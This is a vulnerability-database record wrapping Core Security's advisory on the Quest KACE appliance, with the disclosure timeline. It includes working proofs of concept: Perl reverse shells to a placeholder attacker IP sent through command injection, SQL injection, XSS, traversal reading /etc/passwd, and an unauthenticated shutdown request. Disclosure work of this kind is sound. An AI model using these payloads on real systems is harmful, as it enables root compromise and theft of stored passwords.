\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. 
Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 
\n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. 
\n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. 
*PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11132",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-10906",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11132",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"id": "VAR-201805-0592",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
}
]
},
"last_update_date": "2023-12-18T12:01:57.686000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Patch for Quest KACE System Management Appliance Command Injection Vulnerability (CNVD-2018-10906)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/131201"
},
{
"title": "Quest KACE System Management Appliance Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81234"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.247000",
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
],
"trust": 0.6
}
}
VAR-201805-0602
Vulnerability from variot - Updated: 2023-12-18 12:01 The 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts in the Quest KACE System Management Appliance 8.0.318 are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers in a POST request. An anonymous user can abuse this vulnerability to execute critical functions without authorization. Quest KACE System Management Appliance contains an authorization vulnerability that could be exploited to put the service into a denial-of-service (DoS) state. Quest KACE System Management Appliance is an IT asset management device from Quest Software, USA. Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the impossibility of agreeing on a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
- platform: Indicates the platform on which the agent is going to be installed
- serv: SHA256 hash of a fixed value that depends on each appliance
- orgid: Organization ID
- version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that require higher privileges, the application relies on a message queue that runs with root privileges and only allows a set of commands.
One of the available commands allows changing any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection; specifically, a blind, time-based SQL injection.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection; specifically, an error-based SQL injection.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
